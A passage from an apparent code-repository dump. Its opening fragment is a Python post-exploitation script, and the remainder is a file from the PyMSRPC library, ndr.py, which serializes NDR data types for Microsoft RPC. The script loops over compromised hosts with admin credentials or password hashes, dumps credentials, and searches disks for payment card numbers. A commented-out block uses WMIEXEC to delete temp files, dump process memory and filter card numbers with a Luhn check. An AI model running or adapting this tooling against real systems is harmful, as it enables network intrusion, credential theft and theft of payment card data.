tabulate(tmpResultList,headers,tablefmt=\"simple\")\n\n\n\n\n\n\ntmpResultList=[]\nfor x in accessAdmHostList:\n    ip=x[0]\n    domain=x[1]\n    username=x[2]\n    if len(x[3])==65 and x[3].count(\":\")==1:\n        passwordHash=x[3]\n        password=None\n    else:\n        password=x[3]\n    results=diskCredDump(ip,domain,username,password,passwordHash)\n    for x in results:\n        x=x.strip()\n        if len(x)>0:\n            tmpResultList.append([ip,x])    \nif len(tmpResultList)>0:\n    print (setColor(\"\\nSearch Drives for PAN Numbers\", bold, color=\"green\"))\n    print tabulate(tmpResultList,tablefmt=\"simple\")\n'''\nfor x in accessAdmHostList:\n    ip=x[0]\n    domain=x[1]\n    username=x[2]\n    password=x[3]\n    print (setColor(\"\\nProcesses Running on Hosts\", bold, color=\"green\"))\n    tmpResultList=listProcesses(ip,domain, username, password)\n    tmpResultList1=[]\n    for x in tmpResultList:\n        if len(x)>0:\n            tmpResultList1.append([x,ip])\n    print tabulate(tmpResultList1)\n\n    print (setColor(\"\\nSearching Memory for PAN Numbers\", bold, color=\"green\"))\n    command='del %temp%\\mem_output.txt /F /Q'\n    results=runWMIEXEC(ip,domain,username,password,passwordHash,command)\n    psblacklist=[]\n    psblacklist.append(\"winlogon\")\n    psblacklist.append(\"wininit\")\n    psblacklist.append(\"lsass\")\n    psblacklist.append(\"dns\")\n    psblacklist.append(\"taskmgr\")\n    psblacklist.append(\"taskeng\")\n    psblacklist.append(\"services\")\n    psblacklist.append(\"mmc\")\n    for x in tmpResultList1:        \n        processName=x[0]\n        if processName not in psblacklist:\n            print \"Dumping Process: \"+processName   \n            tmpResultList=memCredDump(ip,domain,username,password,passwordHash,processName)\n    print \"\\nValidating PAN Numbers\"\n    command='type %temp%\\mem_output.txt'\n    results=runWMIEXEC(ip,domain,username,password,passwordHash,command)\n    tmpResultList1=[]\n    tmpResultList=results.split(\"\\n\")\n    count=0\n    for x in tmpResultList:\n        x=x.strip()\n        if \"POSSIBLE CARD NUM: \" in x:\n            x=(x.split(\"POSSIBLE CARD NUM: \")[1]).strip()\n            if x>1:\n                cardNo=x\n                if cardLuhnChecksumIsValid(cardNo)==True:\n                    tmpResultList1.append(tmpResultList[count-1])\n                    tmpResultList1.append(tmpResultList[count])\n        count+=1        \n    if len(tmpResultList1)>0:\n        for x in tmpResultList1:\n            print x\n    else:\n        print \"False positive card numbers found\"\n    command='del %temp%\\mem_output.txt /F /Q'\n    results=runWMIEXEC(ip,domain,username,password,passwordHash,command)\n'''\n\n\n\n'''\n    tmpResultList=runDumpMSSQL(ip,domain,username,password,passwordHash)\n    if len(tmpResultList)>0:\n        for x in tmpResultList:\n            print x\n\n'''\n"
  },
  {
    "path": "deps/ndr.py",
    "content": "#!/usr/bin/env python\n\n'''\n    This file is part of the PyMSRPC project and is licensed under the\n    project license.\n\n    ndr.py\n    \n    This are the functions that provide all the NDR data types.  It handles\n    serialization and everything.  I have spent a shit load of time on this and\n    yet they are not 100%.  This is usually due to structure padding or array\n    serialization but honestly debugging it is such a beating so this is what\n    I have for now.\n    \n    (c) 2007 Cody Pierce - BSD License - See LICENSE.txt\n'''\n\nimport sys, struct, random, re, copy\n\nDEBUG = False\n\n#######################################################################\n#\n# Opcodes\n#\n#######################################################################\n\nclass ndr_opcode:\n    def __init__(self, **kwargs):\n        self.opnum = kwargs.get('opnum', 0x0)\n        self.address = kwargs.get('address', 0x00000000)\n        self.elements = kwargs.get('elements', [])\n        self.out = kwargs.get('out', None)\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        \n    def align(self, data):\n        return self.align_byte * ((4 - (len(data) & 3)) & 3)\n    \n    # Allows us to set a context handle for [in] params\n    def set_context_handle(self, handle):\n        for elem in self.elements:\n            if isinstance(elem, ndr_context_handle):\n                elem.data = handle\n                return True\n        \n        return False\n                \n    def serialize(self):\n        serialdata = \"\"\n        \n        for elem in self.elements:\n            s = elem.serialize()\n            serialdata += s + self.align(s)\n\n        return serialdata\n\n#######################################################################\n#\n#    NDR Parent Classes\n#\n#######################################################################\n\nclass ndr_primitive(object):\n    def align(self, data):\n        return self.align_byte * ((4 - (len(data) & 3)) & 3)\n    \n    def serialize(self):\n        raise NotImplementedError\n        \nclass ndr_container(object):\n    def align(self, data):\n        return self.align_byte * ((4 - (len(data) & 3)) & 3)\n    \n    def add_static(self, obj):\n        if DEBUG: print \"[*] add_static\",\n            \n        if not self.parent:\n            if DEBUG: print \"self\"\n            self.s.append(obj)\n        else:\n            if DEBUG: print \"parent\"\n            self.parent.add_static(obj)\n    \n    def add_deferred(self, obj):\n        if DEBUG: print \"[*] add_deferred\",\n        \n        if not self.parent:\n            if DEBUG: print \"self\"\n            self.d.append(obj)\n        else:\n            if DEBUG: print \"parent\"\n            self.parent.add_deferred(obj)\n                    \n    def serialize(self):\n        raise NotImplementedError\n    \n#######################################################################\n#\n#    Primitives\n#\n#######################################################################\n\nclass ndr_pad(ndr_primitive):\n    '''\n        pad placeholder\n    '''\n    def __init__(self):\n        pass\n    \nclass ndr_byte(ndr_primitive):\n    '''\n        encode: byte element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x06)\n        self.signed = kwargs.get('signed', False)\n        self.name = kwargs.get('name', \"\")\n        self.size = 1\n    \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        if self.signed:\n            return struct.pack(\"<b\", self.data)\n        else:\n            return struct.pack(\"<B\", self.data)\n\nclass ndr_small(ndr_primitive):\n    '''\n        encode: small element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x00)\n        self.signed = kwargs.get('signed', False)\n        self.name = kwargs.get('name', \"\")\n        self.size = 1\n    \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        if self.signed:\n            return struct.pack(\"<b\", self.data)\n        else:\n            return struct.pack(\"<B\", self.data)\n        \nclass ndr_char(ndr_primitive):\n    '''\n        encode: char [*] element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x03)\n        self.signed = kwargs.get('signed', False)\n        self.name = kwargs.get('name', \"\")\n        self.size = 1\n        \n        if self.signed:\n            raise Exception\n    \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n               \n    def serialize(self):\n        return chr(self.data)\n        \nclass ndr_wchar(ndr_primitive):\n    '''\n        encode: wchar element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x42)\n        self.signed = kwargs.get('signed', False)\n        self.name = kwargs.get('name', \"\")\n        self.size = 2\n        \n        if self.signed:\n            raise Exception\n    \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n               \n    def serialize(self):\n        return chr(self.data).encode(\"utf-16le\")\n\nclass ndr_void(ndr_primitive):\n    '''\n        encode: void *element_1\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"\")\n        self.name = kwargs.get('name', \"\")\n        self.size = 4\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        return self.data\n\nclass ndr_user_marshal(ndr_primitive):\n    '''\n        encode: [user_marshal(4)] struct struct_12 * elem_24;\n        Untested/Unsupported because technically ths calls a\n        user function\n    '''\n    def __init__(self, **kwargs):\n        self.num = kwargs.get('num', 0x4)\n        self.data = kwargs.get('data', \"\")\n        self.name = kwargs.get('name', \"\")\n        self.size = 0\n    \n    def get_size(self):\n        return self.size\n        \n    def get_packed(self):\n        return struct.pack(\"<L\", self.num)\n        \nclass ndr_range(ndr_primitive):\n    '''\n        encode: [range(0,1000)] long elem_1;\n    '''\n    def __init__(self, low=0x0, high=0xffffffff, data=\"\"):\n        self.low = kwargs.get('low', 0x0)\n        self.high = kwargs.get('high', 0xffffffff)\n        self.data = kwargs.get('data', \"\")\n        self.size = 0\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        if not self.data:\n            self.data = ndr_long(data=random.randint(self.low, self.high))\n        else:\n            if self.data.get_data() > self.high:\n                self.data.data = self.high\n            elif self.data.get_data() < self.low:\n                self.data.data = self.low\n                \n        return self.data.serialize()\n\nclass ndr_enum16(ndr_primitive):\n    '''\n        encode: /* enum16 */ short element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x0004)\n        self.signed = kwargs.get('signed', True)\n        self.name = kwargs.get('name', \"\")\n        self.size = 2\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        if self.signed:\n            return struct.pack(\"<H\", self.data)\n        else:\n            return struct.pack(\"<h\", self.data)\n                    \nclass ndr_short(ndr_primitive):\n    '''\n        encode: short element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x0004)\n        self.signed = kwargs.get('signed', True)\n        self.name = kwargs.get('name', \"\")\n        self.size = 2\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        if self.signed:\n            return struct.pack(\"<H\", self.data)\n        else:\n            return struct.pack(\"<h\", self.data)\n\nclass ndr_interface(ndr_primitive):\n    '''\n        encode: interface(0000000c-0000-0000-c000-000000000046)\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"\\x89\" * 20)\n        self.name = kwargs.get('name', \"\")\n        self.size = 20\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n            \n    def serialize(self):\n        return self.data\n\nclass ndr_long(ndr_primitive):\n    '''\n        encode: long element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x00000002)\n        self.signed = kwargs.get('signed', True)\n        self.name = kwargs.get('name', \"\")\n        self.size = 4\n        \n    def set_data(self, new_data):\n        self.data = new_data\n            \n    def get_data(self):\n        return self.data\n    \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n            \n    def serialize(self):\n        if self.signed:\n            return struct.pack(\"<l\", self.data)\n        else:\n            return struct.pack(\"<L\", self.data)\n\nclass ndr_hyper(ndr_primitive):\n    '''\n        encode: hyper (aka 64bit) element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x0000000000000005)\n        self.signed = kwargs.get('signed', True)\n        self.name = kwargs.get('name', \"\")\n        self.size = 8\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        if self.signed:\n            return struct.pack(\"<q\", self.data)\n        else:\n            return struct.pack(\"<Q\", self.data)\n\nclass ndr_empty(ndr_primitive):\n    '''\n        used for default or empty cases in unions/unknown stuff\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"\")\n        self.name = kwargs.get('name', \"\")\n        self.size = 0\n    \n    def get_data(self):\n        return self.data\n        \n    def get_name(self):\n        return self.name\n        \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        return \"\"\n        \nclass ndr_float(ndr_primitive):\n    '''\n        encode: float element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0.0)\n        self.name = kwargs.get('name', \"\")\n        self.size = 4\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        return struct.pack(\"<f\", self.data)\n\nclass ndr_double(ndr_primitive):\n    '''\n        encode: double element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0.0)\n        self.name = kwargs.get('name', \"\")\n        self.size = 8\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n        \n    def serialize(self):\n        return struct.pack(\"<d\", self.data)\n        \nclass ndr_string(ndr_primitive):\n    '''\n        encode: char *element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"Administrator\")\n        self.name = kwargs.get('name', \"\")\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        self.size = 0\n        \n    def pad(self, data):\n        return self.align_byte * ((4 - (len(data) & 3)) & 3)\n    \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return len(self.get_packed())\n        \n    def serialize(self):\n        # We add our null because it gets counted\n        self.data += \"\\x00\"\n\n        length = len(self.data)\n        \n        # Conformance varying information\n        return struct.pack(\"<L\", length)   \\\n               + struct.pack(\"<L\", 0)      \\\n               + struct.pack(\"<L\", length) \\\n               + self.data                 \\\n               + self.pad(self.data)       \\\n        \nclass ndr_wstring(ndr_primitive):\n    '''\n        encode: wchar *element_1;\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"\\\\\\\\EXCHANGE2K3\")\n        self.name = kwargs.get('name', \"\")\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        self.size = 0\n        \n    def pad(self, data):\n        return self.align_byte * ((4 - (len(data) & 3)) & 3)\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_data(self):\n        return self.data\n    \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return len(self.get_packed())   \n        \n    def serialize(self):\n        # Add our wide null because it gets counted\n        data = self.data.encode(\"utf-16le\") + \"\\x00\\x00\"\n    \n        length = len(data) / 2\n        return struct.pack(\"<L\", length)   \\\n               + struct.pack(\"<L\", 0)      \\\n               + struct.pack(\"<L\", length) \\\n               + data                      \\\n               + self.pad(data)\n\nclass ndr_string_nonconformant(ndr_primitive):\n    '''\n        encode: [string] char element_1[3];\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"ABCDEFG\")\n        self.name = kwargs.get('name', \"\")\n        self.size = kwargs.get('size', 0)\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        \n    def pad(self, data):\n        return self.align_byte * ((4 - (len(data) & 3)) & 3)\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_data(self):\n        return self.data\n    \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return len(self.get_packed())\n        \n    def serialize(self):\n        # Make sure we stick to our size\n        if len(self.data) < self.size:\n            self.size = len(self.data)\n            data = self.data\n        else:\n            data = self.data[:self.size - 1]\n            \n        # Add our null\n        data += \"\\x00\"\n    \n        return struct.pack(\"<L\", 0)           \\\n               + struct.pack(\"<L\", self.size) \\\n               + data                         \\\n               + self.pad(data)\n\nclass ndr_wstring_nonconformant(ndr_primitive):\n    '''\n        encode: [string] wchar_t element_1[3];\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"ABCDEFG\")\n        self.name = kwargs.get('name', \"\")\n        self.size = kwargs.get('size', 0)\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        \n    def pad(self, data):\n        return self.align_byte * ((4 - (len(data) & 3)) & 3)\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_data(self):\n        return self.data\n    \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return len(self.get_packed())\n        \n    def serialize(self):\n        # Make sure we stick to our size\n        if len(self.data) < self.size:\n            self.size = len(self.data) / 2\n            data = self.data\n        else:\n            data = self.data[:self.size - 1]\n        \n        # Add our wide null\n        data = data.encode(\"utf-16le\") + \"\\x00\\x00\"\n    \n        return struct.pack(\"<L\", 0)           \\\n               + struct.pack(\"<L\", self.size) \\\n               + data                         \\\n               + self.pad(data)\n        \nclass ndr_error_status(ndr_primitive):\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x00000000)\n        self.name = kwargs.get('name', \"\")\n        self.size = 4\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n            \n    def serialize(self):\n        return struct.pack(\"<L\", self.data)\n        \nclass ndr_callback(ndr_primitive):\n    '''\n        encodes size_is(callback_0x12345678)\n        Unsupported because it calls a user function\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', 0x00000000)\n        self.name = kwargs.get('name', \"\")\n        self.size = 4\n        \n    def get_data(self):\n        return self.data\n    \n    def set_data(self, new_data):\n        self.data = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n            \n    def serialize(self):\n        return struct.pack(\"<L\", self.data)\n        \nclass ndr_context_handle(ndr_primitive):\n    '''\n        encodes: [in] context_handle arg_1\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"\\x88\" * 20)\n        self.name = kwargs.get('name', \"\")\n        self.size = 20\n        \n    def get_data(self):\n        return self.data\n    \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n            \n    def serialize(self):\n        return self.data\n\nclass ndr_pipe(ndr_primitive):\n    '''\n        I need an example plz2u\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"\\x8a\" * 20)\n        self.name = kwargs.get('name', \"\")\n        self.size = 20\n    \n    def get_data(self):\n        return self.data\n    \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n        \n    def serialize(self):\n        return self.data\n\nclass ndr_handle_t(ndr_primitive):\n    '''\n        encode: handle_t element_1 (not sent on network)\n    '''\n    def __init__(self, **kwargs):\n        self.data = kwargs.get('data', \"\")\n        self.name = kwargs.get('name', \"\")\n        self.size = 0\n        \n    def get_data(self):\n        return self.data\n    \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n            \n    def serialize(self):\n        return \"\"\n\n#######################################################################\n#\n# Unions\n#\n#######################################################################\n\nclass ndr_union:\n    '''\n    NDR Union: data will be a tuple list of (case, ndr_type)\n    '''\n    \n    def __init__(self, **kwargs):\n        self.elements = kwargs.get('elements', {})\n        self.switch_dep = kwargs.get('switch_dep', \"\")\n        self.name = kwargs.get('name', \"\")\n        self.defname = kwargs.get('defname', \"\")\n        self.size = 0\n        \n    def get_data(self):\n        return self.elements\n        \n    def set_data(self, new_data):\n        self.elements = new_data\n        \n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n    \n    def add_element(self, case, element):\n        self.elements[case] = element\n        \n    def serialize(self):\n        serialdata = \"\"\n        \n        switch = self.switch_dep.get_data()\n        if self.elements.has_key(switch):\n            serialdata += self.switch_dep.serialize()\n        \n            # Pack our requested enum\n            serialdata += self.elements[switch].serialize()\n        else:\n            # This allows us to pick a switch for the user\n            newswitch = self.elements.keys()[0]\n            \n            # We need to update our original switch_dep so it passes correlation checks\n            self.switch_dep.set_data(newswitch)\n            \n            serialdata += ndr_long(data=newswitch).serialize()\n            serialdata += self.elements[newswitch].serialize()\n\n        return serialdata\n\n#######################################################################\n#\n# Pointers\n#\n#######################################################################\nclass ndr_unique(ndr_container):\n    def __init__(self, **kwargs):\n        self.name = kwargs.get('name', \"\")\n        self.data = kwargs.get('data', \"\")\n        self.type = kwargs.get('type', \"\")\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        self.pointer_value = kwargs.get('pointer_value', 0x41424344)\n        self.size = 4\n        self.alignment = 4\n        \n        self.parent = None\n        self.s = []\n        self.d = []\n        \n    def get_name(self):\n        return self.name\n        \n    def get_size(self):\n        return self.size\n    \n    def get_data(self):\n        return self.data\n            \n    def set_data(self, new_data):\n        # We have to use the objects set_data if its a unique/array\n        self.data.set_data(new_data)\n        \n    def serialize(self):\n        self.add_static(ndr_long(data=self.pointer_value))\n        \n        if isinstance(self.data, ndr_container):\n            self.data.parent = self\n        \n        self.add_deferred(self.data)\n        \n        if not self.parent:\n            while len(self.d):\n                d = self.d.pop(0)\n                if isinstance(d, ndr_container):\n                    d.serialize()\n                else:\n                    self.add_static(d)\n            \n            serialdata = \"\"\n            for s in self.s:\n                if isinstance(s, ndr_pad):\n                    serialdata += self.align(serialdata)\n                else:\n                    serialdata += s.serialize()\n            \n            self.parent = None\n            self.s = []\n            self.d = []\n            \n            return serialdata\n            \nclass ndr_full(ndr_container):\n    def __init__(self, **kwargs):\n        self.name = kwargs.get('name', \"\")\n        self.data = kwargs.get('data', \"\")\n        self.type = kwargs.get('type', \"\")\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        self.pointer_value = kwargs.get('pointer_value', 0x41424344)\n        self.size = 4\n        self.alignment = 4\n        \n        self.parent = None\n        self.s = []\n        self.d = []\n        \n    def get_name(self):\n        return self.name\n        \n    def get_size(self):\n        return self.size\n    \n    def get_data(self):\n        return self.data\n            \n    def set_data(self, new_data):\n        # We have to use the objects set_data if its a unique/array\n        self.data.set_data(new_data)\n        \n    def serialize(self):\n        self.add_static(ndr_long(data=self.pointer_value))\n        \n        if isinstance(self.data, ndr_container):\n            self.data.parent = self\n        \n        self.add_deferred(self.data)\n        \n        if not self.parent:\n            while len(self.d):\n                d = self.d.pop(0)\n                if isinstance(d, ndr_container):\n                    d.serialize()\n                else:\n                    self.add_static(d)\n            \n            serialdata = \"\"\n            for s in self.s:\n                if isinstance(s, ndr_pad):\n                    serialdata += self.align(serialdata)\n                else:\n                    serialdata += s.serialize()\n            \n            self.parent = None\n            self.s = []\n            self.d = []\n                \n            return serialdata\n            \n#######################################################################\n#\n# Structures\n#\n#######################################################################\n\nclass ndr_struct(ndr_container):\n    def __init__(self, **kwargs):\n        self.elements = kwargs.get('elements', [])\n        self.name = kwargs.get('name', \"\")\n        self.defname = kwargs.get('defname', \"\")\n        self.type = kwargs.get('type', \"\")\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        \n        self.size = 0\n        self.alignment = 4\n        \n        self.parent = None\n        self.s = []\n        self.d = []\n        \n    def get_data(self):\n        return self.elements\n        \n    def set_data(self, new_data):\n        self.elements = new_data\n        \n    def add_element(self, element):\n        self.elements.append(element)\n    \n    def del_element(self, eid):\n        del(self.elements[eid])\n        \n        return True\n        \n    def get_element_by_id(self, eid=0):\n        return self.elements[eid]\n    \n    def get_element_by_name(self, name):\n        for element in self.elements:\n            try:\n                if element.name == name:\n                    return element\n            except:\n                if DEBUG: print \"[*] Couldnt get name of element\"\n        \n        return False\n\n    def get_name(self):\n        return self.name\n    \n    def get_size(self):\n        return self.size\n    \n    def serialize(self):\n        if DEBUG: print \"[*] Serializing ndr_struct\"\n            \n        # First we take care of our list serializing all containers first, and adding primitives verbatim\n        for e in self.elements:\n            if isinstance(e, ndr_container):\n                e.parent = self\n                e.serialize()\n            else:\n                self.add_static(e)\n        \n        # If we are the top-most structure lets package it all\n        if not self.parent:\n            if DEBUG: print \"[*] Packaging top most struct %s\" % self.name\n                            \n            self.add_static(ndr_pad())\n            \n            while len(self.d):\n                d = self.d.pop(0)\n                if isinstance(d, ndr_container):\n                    d.serialize()\n                else:\n                    self.add_static(d)\n            \n            serialdata = \"\"\n            for s in self.s:\n                if isinstance(s, ndr_pad):                    \n                    serialdata += self.align(serialdata)\n                else:\n                    serialdata += s.serialize()\n            \n            self.parent = None\n            self.s = []\n            self.d = []\n            \n            return serialdata\n\n#######################################################################\n#\n# Arrays\n#\n#######################################################################\n\nclass ndr_array(ndr_container):\n    def array_serialize(self, count):\n        for c in range(count):\n            if isinstance(self.basetype, ndr_container):\n                self.basetype.parent = self\n                self.basetype.serialize()\n            else:\n                self.add_static(self.basetype)\n        \n        if not self.parent:\n            if DEBUG: print \"[*] Packaging top most array %s\" % self.name\n                \n            while len(self.d):\n                d = self.d.pop(0)\n                if isinstance(d, ndr_container):\n                    d.serialize()\n                else:\n                    self.add_static(d)\n            \n            serialdata = \"\"\n            for s in self.s:\n                if isinstance(s, ndr_pad):\n                    serialdata += self.align(serialdata)\n                else:\n                    serialdata += s.serialize()\n            \n            self.parent = None\n            self.s = []\n            self.d = []\n            \n            return serialdata + self.align(serialdata)\n        else:\n            self.add_static(ndr_pad())\n                        \nclass ndr_array_fixed(ndr_array):\n    def __init__(self, **kwargs):\n        self.basetype = kwargs.get('basetype', ndr_empty())\n        self.elements = kwargs.get('elements', [])\n        self.count = kwargs.get('count', 0x0)\n        self.cmod= kwargs.get('cmod', ())\n        self.cptr = kwargs.get('cptr', 0x0)\n        self.name = kwargs.get('name', \"\")\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        self.size = 0\n\n        self.parent = None\n        self.s = []\n        self.d = []\n        \n    def set_data(self, new_data):\n        # We have to use the objects set_data if its a pointer\n        self.basetype.set_data(new_data)\n    \n    def get_size(self):\n        return self.size\n            \n    def get_count(self):\n        return self.count\n\n    def serialize(self):\n        if DEBUG: print \"[*] Serializing ndr_array\"\n        \n        if self.cptr == 1:\n            self.add_static(ndr_long(data=0x41424344))\n            \n        return self.array_serialize(self.count)\n\nclass ndr_array_conformant(ndr_array):    \n    def __init__(self, **kwargs):\n        self.basetype = kwargs.get('basetype', ndr_empty())\n        self.elements = kwargs.get('elements', [])\n        self.count = kwargs.get('count', 0x0)\n        self.cmod= kwargs.get('cmod', ())\n        self.cptr = kwargs.get('cptr', 0x0)\n        self.name = kwargs.get('name', \"\")\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        self.packed_count = False\n        self.size = 0\n    \n        self.parent = None\n        self.s = []\n        self.d = []\n        \n    def set_data(self, new_data):\n        # We have to use the objects set_data if its a pointer\n        self.basetype.set_data(new_data)\n    \n    def get_size(self):\n        return self.size\n    \n    def serialize(self):\n        if DEBUG: print \"[*] Serializing ndr_array_conformant\"\n        \n        if self.cptr == 1:\n            self.add_static(ndr_long(data=0x41424344))\n        \n        # Pack our count\n        if isinstance(self.count, int):\n            num = self.count\n            \n            self.add_static(ndr_long(data=num))\n            \n        # If we used a ascii rep of size pack it\n        # YYY: callback_0x12345678 will fail here\n        elif isinstance(self.count, str):\n            num = int(self.count)\n            \n            self.add_static(ndr_long(data=num))\n        # else we have a ndr object to pack\n        else:\n            # We have to handle the math operators i.e. [size_is(arg1 / 2)]\n            num = self.count.get_data()\n            if self.cmod:\n                if self.cmod[0] == \"/\":\n                    num /= self.cmod[1]\n                elif self.cmod[0] == \"*\":\n                    num *= self.cmod[1]\n                else:\n                    print \"[!] Problem with operator %s\" % self.cmod[0]\n                    sys.exit(-1)\n                      \n            self.add_static(ndr_long(data=num))\n        # End pack count\n        \n        return self.array_serialize(num)\n\nclass ndr_array_varying(ndr_array):\n    def __init__(self, **kwargs):\n        self.basetype = kwargs.get('basetype', ndr_empty())\n        self.elements = kwargs.get('elements', [])\n        self.count = kwargs.get('count', 0x0)\n        self.cmod= kwargs.get('cmod', ())\n        self.cptr = kwargs.get('cptr', 0x0)\n        self.name = kwargs.get('name', \"\")\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        \n        self.packed_count = False\n        self.size = 0\n\n        self.parent = None\n        self.s = []\n        self.d = []\n        \n    def set_data(self, new_data):\n        # We have to use the objects set_data if its a pointer\n        self.basetype.set_data(new_data)\n    \n    def get_size(self):\n        return self.size\n\n    def serialize(self):\n        # Pack offset\n        self.add_static(ndr_long(data=0x0))\n        \n        # Need example of the cptr stuff\n        if self.cptr == 1:\n            self.add_static(ndr_long(data=0x41424344))\n            \n        if isinstance(self.count, int):\n            num = self.count\n        elif isinstance(self.count, str):\n            num = int(self.count)\n        else:\n            num = self.count.get_data()\n            if self.cmod:\n                if self.cmod[0] == \"/\":\n                    num /= self.cmod[1]\n                elif self.cmod[0] == \"*\":\n                    num *= self.cmod[1]\n                else:\n                    print \"[!] Problem with operator %s\" % self.cmod[0]\n                    sys.exit(-1)\n        \n        # Pack our array count    \n        self.add_static(ndr_long(data=num))\n        \n        return self.array_serialize(num)\n\nclass ndr_array_conformant_varying(ndr_array):\n    def __init__(self, **kwargs):\n        self.basetype = kwargs.get('basetype', ndr_empty())\n        self.elements = kwargs.get('elements', [])\n        \n        self.maxcount = kwargs.get('maxcount', 0x0)\n        self.mmod= kwargs.get('mmod', ())\n        self.mptr = kwargs.get('mptr', 0x0)\n        \n        self.passed = kwargs.get('passed', 0x0)\n        self.pmod= kwargs.get('pmod', ())\n        self.pptr = kwargs.get('pptr', 0x0)\n        \n        self.name = kwargs.get('name', \"\")\n        self.align_byte = kwargs.get('align_byte', \"\\xaa\")\n        \n        self.packed_count = True\n        self.size = 0\n        \n        self.parent = None\n        self.s = []\n        self.d = []\n        \n    def set_data(self, new_data):\n        # We have to use the objects set_data if its a pointer\n        self.basetype.set_data(new_data)\n    \n    def get_size(self):\n        return self.size\n\n    def serialize(self):\n        # Need example of the mptr stuff\n        if self.mptr == 1:\n            self.add_static(ndr_long(data=0x41424344))\n        \n        # Do conformant stuff\n        if isinstance(self.maxcount, int):\n            mnum = self.maxcount\n        elif isinstance(self.maxcount, 